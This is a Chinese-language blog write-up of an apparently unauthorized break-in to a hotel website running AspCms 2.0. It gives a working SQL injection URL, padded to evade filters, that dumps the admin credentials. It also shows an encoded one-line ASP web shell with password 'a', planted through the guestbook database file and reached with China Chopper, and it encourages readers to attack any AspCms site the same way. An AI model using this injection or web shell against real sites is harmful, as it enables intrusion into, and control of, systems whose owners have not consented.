這是某個(gè)國(guó)際酒店的網(wǎng)站，由于使用了AspCms 2.0，通過(guò)SQL注入我們很快可以拿下shell

此次測(cè)試中，由于網(wǎng)站限制了所有的讀寫(xiě)權(quán)限，由各種錯(cuò)誤，以及最后的小馬根本沒(méi)什么權(quán)限。

網(wǎng)站首頁(yè)

0x01 基礎(chǔ)信息：

簡(jiǎn)單看看指紋信息：

指紋信息

是ASPCMS的，通過(guò)一個(gè)通用SQL注入拿到管理員的賬號(hào)密碼：

EXP:

https://blog.dyboy.cn/plug/comment
/commentList.asp?id=0%20unmasterion%20
semasterlect%20top%201%20UserID,GroupID,
LoginName,Password,now%28%29,null,1%20%20
frmasterom%20%7bprefix%7duser

利用EXP直接獲得：

EXP利用

解密得到管理員

賬號(hào)：admin

密碼：123456

0x02 深入測(cè)試：

后臺(tái)默認(rèn)為： https://blog.dyboy.cn/admin_aspcms/

登陸管理后臺(tái)

后臺(tái)管理

根據(jù)以前的添加模版的方法不可行，再多看幾下，發(fā)現(xiàn)整個(gè)網(wǎng)站是沒(méi)有寫(xiě)入權(quán)限的...

這里要提一個(gè)東西就是aspcms默認(rèn)的留言板數(shù)據(jù)庫(kù)路徑：
https://blog.dyboy.cn/data/data.asp

有的我們?cè)诹粞园辶粞砸痪湓?/p>

┼攠數(shù)畣整爠煥敵瑳∨≡┩愾
密碼：a
菜刀連接 https://blog.dyboy.cn/data/data.asp 即可

因?yàn)檎麄€(gè)網(wǎng)站都沒(méi)有寫(xiě)的權(quán)限，應(yīng)該這個(gè)網(wǎng)站之前就有被入侵的經(jīng)歷吧，所以做了限制，找到備份文件的地方，嘗試了一下，雖然顯示成功備份，事實(shí)上不能備份。

因?yàn)椴荒苤苯酉螺d備份文件，就直接訪問(wèn)備份文件，發(fā)現(xiàn)一個(gè)有趣的東西：

備份文件無(wú)法下載

有一個(gè) execute 語(yǔ)句，大家應(yīng)該有所想法的

然后死馬當(dāng)活馬醫(yī)，直接菜刀鏈接備份數(shù)據(jù)庫(kù)文件，猜測(cè)密碼為a，因?yàn)閿?shù)據(jù)庫(kù)文件比較大，所以每次的操作都會(huì)消耗較長(zhǎng)的時(shí)間

然后就這么就連上了...

拿下shell

前面也說(shuō)了整個(gè)網(wǎng)站都沒(méi)權(quán)限，雞肋shell一個(gè)。

0x03 總結(jié)：

shell是否有權(quán)限不重要，aspcms的都可以這么黑盒測(cè)試

提供一下這個(gè) ASPcms 2.0 的源碼下載地址：

http://down.admin5.com/asp/73162.html

空閑有能力的朋友可以審計(jì)一下，ASP的我就會(huì)一句話[捂臉]...

原文地址: https://blog.dyboy.cn/websecurity/49.html